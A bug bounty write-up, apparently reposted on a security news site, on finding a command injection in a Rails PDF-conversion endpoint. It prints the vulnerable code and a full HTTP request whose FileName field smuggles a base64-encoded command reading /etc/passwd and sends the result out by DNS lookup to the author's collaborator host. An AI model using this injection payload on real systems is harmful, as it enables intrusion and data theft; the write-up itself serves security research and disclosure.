Basic recon to RCE III


For the 3rd and I think last episode of the series, we’re going to continue with the same target as the episode 2, that I recommend you to go and see at first to put you a bit more in the context : Basic recon to RCE II

The Story

So, after this first RCE discovered on the application, I wanted to continue to dig, especially because this debug mode displays a POST method on the endpoint /convertdoctopdf. So I immediately thought about a SSRF and as it’s a bug that I like quite a lot, I wanted to dig it.

Another advantage of the debug mode (on Rails and maybe with other frameworks) is that if the application raises an exception, it will show you the part of the source code concerned in the response, which is pretty handy when you don’t know which parameter you should use !

After a first POST request without body, the application displays an error 500 with the piece of code that concerns the error, which tells us that the SessionId parameter is missing. I spare you the details but this technique allowed me to obtain the complete code of the method :

def convertdoctopdf
  header = {'Content-Type' =>'application/json','Authorization' => 'OAuth '+params['SessionId']}
  id = params['AttachmentId']
  baseURL = params['Url']
  fileName = params['FileName'] ? params['FileName']+(Time.now.to_i).to_s : 'fileconvert'+(Time.now.to_i).to_s
  uri = URI.parse(baseURL+"/services/data/v44.0/sobjects/Attachment/"+id+"/Body")
  
  https = Net::HTTP.new(uri.host,uri.port)
  https.use_ssl = true
  req = Net::HTTP::Get.new(uri.path, header)
  attachment = https.request(req)

  File.open("#{Rails.root}/public/#{fileName+'.docx'}", 'wb') { |f| f.write(attachment.body) }
  %x(/usr/bin/soffice --headless --convert-to pdf --outdir  "#{Rails.root}/public/file_conversion/" "#{Rails.root}/public/#{fileName+'.docx'}")

  outputfileBase64 = Base64.encode64(open("#{Rails.root}/public/file_conversion/#{fileName}.pdf").to_a.join);
 
  File.delete("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}") if File.exist?("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}")
  File.delete("#{Rails.root}/public/#{fileName+'.docx'}") if File.exist?("#{Rails.root}/public/#{fileName+'.docx'}")
 
  render json: {file: outputfileBase64}, status: :created, location: "Done"
end

Which can be described as follows:

  • header = Expects the SessionID parameter but is not important here, you can put anything
  • id = Waits for the AttachmentId parameter but is not important either, you can put anything too
  • baseUrl = Waits for the url parameter, just enter a valid URL
  • fileName = There is a ternary condition that makes it an optional parameter
  • Then a GET request is made, the content is saved to a file, converted to PDF and displayed to the user in base64

I had first stopped after leaking the HTTP request line thinking that was all I needed to trigger my SSRF. Except:

  • A GET request is made on the URL + path /services/data/v44.0/sobjects/Attachment/"+id+"/Body" but that can be easily bypassed by specifying a URL of type https://domain.tld/?x=, the path will then be forced as the parameter value.
    • The URL will become: https://domain.tld/?x=/services/data/v44.0/sobjects/Attachment/"+id+"/Body"
  • https.use_ssl = true which is the blocking point because it forces the use of HTTPS

Going back to our source code, I was saying that the body of the response is saved in a file (with the extension docx but in fact it doesn’t matter, it’s not a real docx but rather a simple text file) and then the soffice binary is called and converts this file into a PDF and displays the content of the PDF in base64 in the response. Something I didn’t know yet because I was too focused on the SSRF and I could see in the return of my request in the answer and I didn’t try to understand the cause.

I spent a few hours on the SSRF without being able to exploit it because :

  • The use of HTTPS prevents me from typing on internal URLs such as http://127.0.0.1
  • The target must have a valid certificate
  • For some reason I couldn’t query a target using a let’s encrypt certificate…

Anyway, after these blocking points, to try to inject some code in my PDF I used a Github repository on which I uploaded my PoC then I used the RAW URL (like https://raw.githubusercontent.com/user/poc/master/poc.html) to inject the content in the PDF. Unfortunately after many tries, the only tag that seemed to be interpreted was the </code> tag, the others were either deleted or not interpreted.</p><p>A little disappointed at the time, I gave up because I had other things to do.<br /> That same day I spent the evening with my hunter friend Serizao, and I obviously told him my SSRF problem, we continued to dig together and to have a better overview, we recovered the complete code of the method above.</p><p>At this moment, a line directly appealed to us.</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#e6db74">%x(/usr/bin/soffice --headless --convert-to pdf --outdir "</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">Rails</span><span style="color:#f92672">.</span>root<span style="color:#e6db74">}</span><span style="color:#e6db74">/public/file_conversion/" "</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">Rails</span><span style="color:#f92672">.</span>root<span style="color:#e6db74">}</span><span style="color:#e6db74">/public/</span><span style="color:#e6db74">#{</span>fileName<span style="color:#f92672">+</span><span style="color:#e6db74">'.docx'</span><span style="color:#e6db74">}</span><span style="color:#e6db74">")</span> </span></span></code></pre></div><p>The use of <code>%x()</code> is an alternative to the use of backticks which allows you to make a system call and display the output. Like backticks, <code>%x()</code> also allows string interpolation.</p><p>I explained above, that the FileName parameter is optional :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span>fileName <span style="color:#f92672">=</span> params<span style="color:#f92672">[</span><span style="color:#e6db74">'FileName'</span><span style="color:#f92672">]</span> ? params<span style="color:#f92672">[</span><span style="color:#e6db74">'FileName'</span><span style="color:#f92672">]+</span>(<span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i)<span style="color:#f92672">.</span>to_s : <span style="color:#e6db74">'fileconvert'</span><span style="color:#f92672">+</span>(<span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i)<span style="color:#f92672">.</span>to_s </span></span></code></pre></div><p>Because if it is not present, it is set with a default value automatically, but if it is present, it is equivalent to the user input (and this is where the vulnerability lies). The problem is that the string interpolation allows to inject an arbitrary command to execute an additional command to the soffice binary call.</p><p>Example to illustrate my point, inside <code>irb</code> :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">001</span> <span style="color:#f92672">></span> filename <span style="color:#f92672">=</span> <span style="color:#e6db74">'`id`'</span><span style="color:#f92672">+</span><span style="color:#66d9ef">Time</span><span style="color:#f92672">.</span>now<span style="color:#f92672">.</span>to_i<span style="color:#f92672">.</span>to_s </span></span><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">002</span> <span style="color:#f92672">></span> <span style="color:#e6db74">%x("</span><span style="color:#e6db74">#{</span>filename<span style="color:#e6db74">}</span><span style="color:#e6db74">")</span> </span></span><span style="display:flex;"><span><span style="color:#e6db74">sh</span>: uid<span style="color:#f92672">=</span><span style="color:#ae81ff">635388061</span>(jomar) <span style="color:#f92672">[...]</span><span style="color:#ae81ff">1646581930</span>: command <span style="color:#f92672">not</span> found </span></span><span style="display:flex;"><span> <span style="color:#f92672">=></span> <span style="color:#e6db74">""</span> </span></span><span style="display:flex;"><span><span style="color:#ae81ff">2</span><span style="color:#f92672">.</span><span style="color:#ae81ff">7</span><span style="color:#f92672">.</span><span style="color:#ae81ff">1</span> :<span style="color:#ae81ff">003</span> <span style="color:#f92672">></span> </span></span></code></pre></div><p>So we can see that the id command is executed.<br /> With the following request, it is possible to escape the call to soffice and execute an arbitrary command, to show the vulnerability, I extracted the first characters of the <code>/etc/passwd</code> file :</p><pre tabindex="0"><code>POST /convertdoctopdf HTTP/1.1 Host: sub.target.tld User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Length: 214 Content-Type: application/json;charset=UTF-8 { "SessionId":"1", "AttachmentId":"1", "FileName": "" && getent hosts $(`echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d`).9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld #"", "Url":"https://www.google.com" } </code></pre><p><em>Side note</em> : a domain name can be 255 characters long but a subdomain is limited to 63 characters, think about it if you do a DNS extraction</p><p>Explanation of</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#e6db74">"" && getent hosts </span><span style="color:#66d9ef">$(</span><span style="color:#e6db74">`</span>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg<span style="color:#f92672">==</span> | base64 -d<span style="color:#e6db74">`</span><span style="color:#66d9ef">)</span><span style="color:#e6db74">.9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld #" </span></span></span></code></pre></div><ul><li><code>"</code> : Allows to close the parameter pass to soffice binary for the file name</li><li><code>&&</code> : Indicates that a second command is being processed</li><li><code>getent hosts</code> : Not having <code>curl</code>, <code>dig</code>, <code>ping</code> etc… available in the environment I used <code>getent hosts</code> to execute a DNS query</li><li><code>$(echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d)</code> : To avoid encoding problems because of the <code>/</code> which raises an error with the File.open so, we put our command in base64<ul><li><code>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg== | base64 -d => head -c 4 /etc/passwd</code>. The first 4 characters of the <code>/etc/passwd</code> file which correspond to root<ul><li><code>9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld</code> : My private burp collaborator server</li><li><code>#"</code> : Allows you to comment out the end of the line and the <code>"</code> to avoid a syntax error in the command</li></ul></li></ul></li></ul><p>In the end, the executed command will be :</p><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>/usr/bin/soffice --headless --convert-to pdf --outdir <span style="color:#e6db74">"folder/public/file_conversion/"</span> <span style="color:#e6db74">"folder/public/"</span> <span style="color:#f92672">&&</span> getent hosts <span style="color:#66d9ef">$(</span><span style="color:#e6db74">`</span>echo aGVhZCAtYyA0IC9ldGMvcGFzc3dkCg<span style="color:#f92672">==</span> | base64 -d<span style="color:#e6db74">`</span><span style="color:#66d9ef">)</span>.9blrzz2yqaikw8t47xdlfgsa91fr3g.private.collaborator.tld <span style="color:#75715e">#".pdf").to_a.join);</span> </span></span></code></pre></div><h2 id="conclusion">Conclusion</h2><p>A bug that I found super interesting and was also present for a long time. I know because I had already identified this method more than 6 months ago but I had not taken the time to dig.</p><p>What made the difference today is something that is very well explained here: <a rel="nofollow noopener" target="_blank" href="https://twitter.com/hacker_/status/1509147518638116866">Corben Leo – Hacking CAN be easy</a>. I’ve been developing small web / api applications on my own time for several months now and I use Ruby on Rails, in addition to giving me a good knowledge of the framework, it also gives me a better vision of a developer and sometimes I do sh*t because I want to go fast or because it annoys me and if I make these mistakes, why shouldn’t others do it too ?</p><p>But also probably because rather than going from domain to domain looking for the ugly stuff that looks vulnerable, I thought I really wanted to exploit this thing and so I spent some time on it. Which shows once again that sometimes it’s much more interesting to focus on an application and understand it than to try to find a magic domain and spread payloads around without understanding what you’re doing</p></p></div><p><script type="litespeed/javascript" data-src="//platform.twitter.com/widgets.js" charset="utf-8"></script><br /> <br /><a href="https://bunny.net?ref=4buc1qv1m5" border="0"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI5MzYiIGhlaWdodD0iMTIwIiB2aWV3Qm94PSIwIDAgOTM2IDEyMCI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" decoding="async" data-src="https://image.cybernoz.com/aff/bunny.png" width="936" height="120" /></a><br /> <br /><a href="https://www.jomar.fr/posts/2022/basic_recon_to_rce_iii/">Source link </a></p></div><div class="gridhot-related-posts-wrapper" id="gridhot-related-posts-wrapper"><div class="gridhot-related-posts-header"><h3 class="gridhot-related-posts-title"><span class="gridhot-related-posts-title-inside">Related Articles</span></h3></div><div class="gridhot-related-posts-list"><div class="gridhot-related-post-item gridhot-4-col-item"><div class="gridhot-related-post-item-thumbnail gridhot-related-post-item-child"> <a class="gridhot-related-post-item-title gridhot-related-post-item-thumbnail-link" href="https://cybernoz.com/mullvads-free-dns-over-https-service-is-a-no-brainer-for-these-reasons-youtube/" title="Permanent Link to Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjAiIGhlaWdodD0iMjcwIiB2aWV3Qm94PSIwIDAgMzYwIDI3MCI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" width="360" height="270" data-src="https://image.cybernoz.com/wp-content/uploads/2023/03/Mullvads-FREE-DNS-over-HTTPS-service-is-a-no-brainer-for-360x270.jpg" class="gridhot-related-post-item-thumbnail-img wp-post-image" alt="Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons - YouTube" title="Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube" decoding="async" fetchpriority="high" /></a><div class="gridhot-mini-share-buttons-wrapper"><div class="gridhot-mini-share-buttons"><i class="fas fa-share-alt" aria-hidden="true"></i><div class="gridhot-mini-share-buttons-inner gridhot-clearfix"><div class="gridhot-mini-share-buttons-content"><a class="gridhot-mini-share-button gridhot-mini-share-button-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&title=Mullvad%E2%80%99s%20FREE%20DNS%20over%20HTTPS%20service%20is%20a%20no-brainer%20for%20these%20reasons%20%26%238211%3B%20YouTube&url=https%3A%2F%2Fcybernoz.com%2Fmullvads-free-dns-over-https-service-is-a-no-brainer-for-these-reasons-youtube%2F" target="_blank" rel="nofollow" aria-label="Share on Linkedin : Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube"><i class="fab fa-linkedin-in" aria-hidden="true" title="Share this on Linkedin"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fcybernoz.com%2Fmullvads-free-dns-over-https-service-is-a-no-brainer-for-these-reasons-youtube%2F" target="_blank" rel="nofollow" aria-label="Share on Facebook : Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube"><i class="fab fa-facebook-f" aria-hidden="true" title="Share this on Facebook"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-twitter" href="https://x.com/intent/post?text=Mullvad%E2%80%99s%20FREE%20DNS%20over%20HTTPS%20service%20is%20a%20no-brainer%20for%20these%20reasons%20%26%238211%3B%20YouTube&url=https%3A%2F%2Fcybernoz.com%2Fmullvads-free-dns-over-https-service-is-a-no-brainer-for-these-reasons-youtube%2F" target="_blank" rel="nofollow" aria-label="Share on X : Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube"><i class="fab fa-x-twitter" aria-hidden="true" title="Share this on X"></i></a></div></div></div></div></div><div class="gridhot-related-post-item-heading gridhot-related-post-item-child"><a class="gridhot-related-post-item-title" href="https://cybernoz.com/mullvads-free-dns-over-https-service-is-a-no-brainer-for-these-reasons-youtube/" title="Permanent Link to Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube">Mullvad’s FREE DNS over HTTPS service is a no-brainer for these reasons – YouTube</a></div></div><div class="gridhot-related-post-item gridhot-4-col-item"><div class="gridhot-related-post-item-thumbnail gridhot-related-post-item-child"> <a class="gridhot-related-post-item-title gridhot-related-post-item-thumbnail-link" href="https://cybernoz.com/quantifying-the-value-of-bug-bounty-programs-roi-rom-or-both/" title="Permanent Link to Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjAiIGhlaWdodD0iMjcwIiB2aWV3Qm94PSIwIDAgMzYwIDI3MCI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" width="360" height="270" data-src="https://image.cybernoz.com/wp-content/uploads/2024/09/Quantifying-the-Value-of-Bug-Bounty-Programs-ROI-ROM-or-360x270.png" class="gridhot-related-post-item-thumbnail-img wp-post-image" alt="Hackerone logo" title="Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?" decoding="async" /></a><div class="gridhot-mini-share-buttons-wrapper"><div class="gridhot-mini-share-buttons"><i class="fas fa-share-alt" aria-hidden="true"></i><div class="gridhot-mini-share-buttons-inner gridhot-clearfix"><div class="gridhot-mini-share-buttons-content"><a class="gridhot-mini-share-button gridhot-mini-share-button-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&title=Quantifying%20the%20Value%20of%20Bug%20Bounty%20Programs%3A%20ROI%2C%20ROM%2C%20or%20Both%3F&url=https%3A%2F%2Fcybernoz.com%2Fquantifying-the-value-of-bug-bounty-programs-roi-rom-or-both%2F" target="_blank" rel="nofollow" aria-label="Share on Linkedin : Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?"><i class="fab fa-linkedin-in" aria-hidden="true" title="Share this on Linkedin"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fcybernoz.com%2Fquantifying-the-value-of-bug-bounty-programs-roi-rom-or-both%2F" target="_blank" rel="nofollow" aria-label="Share on Facebook : Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?"><i class="fab fa-facebook-f" aria-hidden="true" title="Share this on Facebook"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-twitter" href="https://x.com/intent/post?text=Quantifying%20the%20Value%20of%20Bug%20Bounty%20Programs%3A%20ROI%2C%20ROM%2C%20or%20Both%3F&url=https%3A%2F%2Fcybernoz.com%2Fquantifying-the-value-of-bug-bounty-programs-roi-rom-or-both%2F" target="_blank" rel="nofollow" aria-label="Share on X : Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?"><i class="fab fa-x-twitter" aria-hidden="true" title="Share this on X"></i></a></div></div></div></div></div><div class="gridhot-related-post-item-heading gridhot-related-post-item-child"><a class="gridhot-related-post-item-title" href="https://cybernoz.com/quantifying-the-value-of-bug-bounty-programs-roi-rom-or-both/" title="Permanent Link to Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?">Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?</a></div></div><div class="gridhot-related-post-item gridhot-4-col-item"><div class="gridhot-related-post-item-thumbnail gridhot-related-post-item-child"> <a class="gridhot-related-post-item-title gridhot-related-post-item-thumbnail-link" href="https://cybernoz.com/unpacking-the-zimbra-cross-site-scripting-vulnerability-cve-2023-37580/" title="Permanent Link to Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjAiIGhlaWdodD0iMjQxIiB2aWV3Qm94PSIwIDAgMzYwIDI0MSI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" width="360" height="241" data-src="https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580.png" class="gridhot-related-post-item-thumbnail-img wp-post-image" alt="Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)" title="Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)" decoding="async" data-srcset="https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580.png 1614w, https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580-300x201.png 300w, https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580-1024x685.png 1024w, https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580-768x514.png 768w, https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580-1536x1028.png 1536w, https://image.cybernoz.com/wp-content/uploads/2023/11/Unpacking-the-Zimbra-Cross-Site-Scripting-Vulnerability-CVE-2023-37580-930x620.png 930w" data-sizes="(max-width: 360px) 100vw, 360px" /></a><div class="gridhot-mini-share-buttons-wrapper"><div class="gridhot-mini-share-buttons"><i class="fas fa-share-alt" aria-hidden="true"></i><div class="gridhot-mini-share-buttons-inner gridhot-clearfix"><div class="gridhot-mini-share-buttons-content"><a class="gridhot-mini-share-button gridhot-mini-share-button-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&title=Unpacking%20the%20Zimbra%20Cross-Site%20Scripting%20Vulnerability%20%28CVE-2023-37580%29&url=https%3A%2F%2Fcybernoz.com%2Funpacking-the-zimbra-cross-site-scripting-vulnerability-cve-2023-37580%2F" target="_blank" rel="nofollow" aria-label="Share on Linkedin : Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)"><i class="fab fa-linkedin-in" aria-hidden="true" title="Share this on Linkedin"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fcybernoz.com%2Funpacking-the-zimbra-cross-site-scripting-vulnerability-cve-2023-37580%2F" target="_blank" rel="nofollow" aria-label="Share on Facebook : Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)"><i class="fab fa-facebook-f" aria-hidden="true" title="Share this on Facebook"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-twitter" href="https://x.com/intent/post?text=Unpacking%20the%20Zimbra%20Cross-Site%20Scripting%20Vulnerability%20%28CVE-2023-37580%29&url=https%3A%2F%2Fcybernoz.com%2Funpacking-the-zimbra-cross-site-scripting-vulnerability-cve-2023-37580%2F" target="_blank" rel="nofollow" aria-label="Share on X : Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)"><i class="fab fa-x-twitter" aria-hidden="true" title="Share this on X"></i></a></div></div></div></div></div><div class="gridhot-related-post-item-heading gridhot-related-post-item-child"><a class="gridhot-related-post-item-title" href="https://cybernoz.com/unpacking-the-zimbra-cross-site-scripting-vulnerability-cve-2023-37580/" title="Permanent Link to Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)">Unpacking the Zimbra Cross-Site Scripting Vulnerability (CVE-2023-37580)</a></div></div><div class="gridhot-related-post-item gridhot-4-col-item"><div class="gridhot-related-post-item-thumbnail gridhot-related-post-item-child"> <a class="gridhot-related-post-item-title gridhot-related-post-item-thumbnail-link" href="https://cybernoz.com/breaking-down-the-benefits-of-hacker-powered-pen-tests/" title="Permanent Link to Breaking Down the Benefits of Hacker-Powered Pen Tests"><img data-lazyloaded="1" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjAiIGhlaWdodD0iMjM1IiB2aWV3Qm94PSIwIDAgMzYwIDIzNSI+PHJlY3Qgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc3R5bGU9ImZpbGw6I2NmZDRkYjtmaWxsLW9wYWNpdHk6IDAuMTsiLz48L3N2Zz4=" width="360" height="235" data-src="https://image.cybernoz.com/wp-content/uploads/2023/05/Breaking-Down-the-Benefits-of-Hacker-Powered-Pen-Tests-360x235.png" class="gridhot-related-post-item-thumbnail-img wp-post-image" alt="Breaking Down the Benefits of Hacker-Powered Pen Tests" title="Breaking Down the Benefits of Hacker-Powered Pen Tests" decoding="async" /></a><div class="gridhot-mini-share-buttons-wrapper"><div class="gridhot-mini-share-buttons"><i class="fas fa-share-alt" aria-hidden="true"></i><div class="gridhot-mini-share-buttons-inner gridhot-clearfix"><div class="gridhot-mini-share-buttons-content"><a class="gridhot-mini-share-button gridhot-mini-share-button-linkedin" href="https://www.linkedin.com/shareArticle?mini=true&title=Breaking%20Down%20the%20Benefits%20of%20Hacker-Powered%20Pen%20Tests&url=https%3A%2F%2Fcybernoz.com%2Fbreaking-down-the-benefits-of-hacker-powered-pen-tests%2F" target="_blank" rel="nofollow" aria-label="Share on Linkedin : Breaking Down the Benefits of Hacker-Powered Pen Tests"><i class="fab fa-linkedin-in" aria-hidden="true" title="Share this on Linkedin"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fcybernoz.com%2Fbreaking-down-the-benefits-of-hacker-powered-pen-tests%2F" target="_blank" rel="nofollow" aria-label="Share on Facebook : Breaking Down the Benefits of Hacker-Powered Pen Tests"><i class="fab fa-facebook-f" aria-hidden="true" title="Share this on Facebook"></i></a><a class="gridhot-mini-share-button gridhot-mini-share-button-twitter" href="https://x.com/intent/post?text=Breaking%20Down%20the%20Benefits%20of%20Hacker-Powered%20Pen%20Tests&url=https%3A%2F%2Fcybernoz.com%2Fbreaking-down-the-benefits-of-hacker-powered-pen-tests%2F" target="_blank" rel="nofollow" aria-label="Share on X : Breaking Down the Benefits of Hacker-Powered Pen Tests"><i class="fab fa-x-twitter" aria-hidden="true" title="Share this on X"></i></a></div></div></div></div></div><div class="gridhot-related-post-item-heading gridhot-related-post-item-child"><a class="gridhot-related-post-item-title" href="https://cybernoz.com/breaking-down-the-benefits-of-hacker-powered-pen-tests/" title="Permanent Link to Breaking Down the Benefits of Hacker-Powered Pen Tests">Breaking Down the Benefits of Hacker-Powered Pen Tests</a></div></div></div></div></div></article><nav class="navigation post-navigation" aria-label="Posts"><h2 class="screen-reader-text">Post navigation</h2><div class="nav-links"><div class="nav-previous"><a href="https://cybernoz.com/how-a-catholic-group-doxed-gay-priests/" rel="prev">How a Catholic Group Doxed Gay Priests →</a></div><div class="nav-next"><a href="https://cybernoz.com/batloader-malware-uses-google-ads-to-deliver-vidar-stealer-and-ursnif-payloads/" rel="next">← BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads</a></div></div></nav><div class="clear"></div></div></div></div></div><div class="gridhot-sidebar-one-wrapper gridhot-sidebar-widget-areas gridhot-clearfix" id="gridhot-sidebar-one-wrapper" itemscope="itemscope" itemtype="http://schema.org/WPSideBar" role="complementary"><div class="theiaStickySidebar"><div class="gridhot-sidebar-one-wrapper-inside gridhot-clearfix"><div id="block-3" class="gridhot-side-widget widget gridhot-widget-box widget_block"><div class="gridhot-widget-box-inside"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">Latest Posts</h2><ul class="wp-block-latest-posts__list wp-block-latest-posts"><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/yoma-fleet-selects-accuknox-siem-to-replace-legacy-tools/">Yoma Fleet Selects AccuKnox SIEM to Replace Legacy Tools</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/phishing-campaign-spoofs-local-officials-to-steal-permit-fees/">Phishing campaign spoofs local officials to steal permit fees</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/ai-chooses-nuclear-escalation-in-95-of-simulated-crises/">AI chooses nuclear escalation in 95% of simulated crises</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/u-s-cisa-adds-ivanti-epm-solarwinds-and-omnissa-workspace-one-flaws-to-its-known-exploited-vulnerabilities-catalog/">U.S. CISA adds Ivanti EPM, SolarWinds, and Omnissa Workspace One flaws to its Known Exploited Vulnerabilities catalog</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/no-its-not-unnecessarily-burdensome-to-control-your-own-data/">No, it’s not ‘unnecessarily burdensome’ to control your own data</a></li></ul></div></div></div></div></div></div></div></div></div></div><div class='gridhot-clearfix' id='gridhot-copyright-area'><div class='gridhot-copyright-area-inside gridhot-container'><div class="gridhot-outer-wrapper"><div class='gridhot-copyright-area-inside-content gridhot-clearfix'><p class='gridhot-copyright'>Copyright © 2026 Cybernoz - Cybersecurity News</p><p class='gridhot-credit'><a href="https://themesdna.com/">Design by ThemesDNA.com</a></p></div></div></div></div><button class="gridhot-scroll-top" title="Scroll to Top"><i class="fas fa-arrow-up" aria-hidden="true"></i><span class="gridhot-sr-only">Scroll to Top</span></button> <noscript><div> <img src="https://mc.yandex.ru/watch/102510865" style="position:absolute; left:-9999px;" alt=""/></div> </noscript> <script 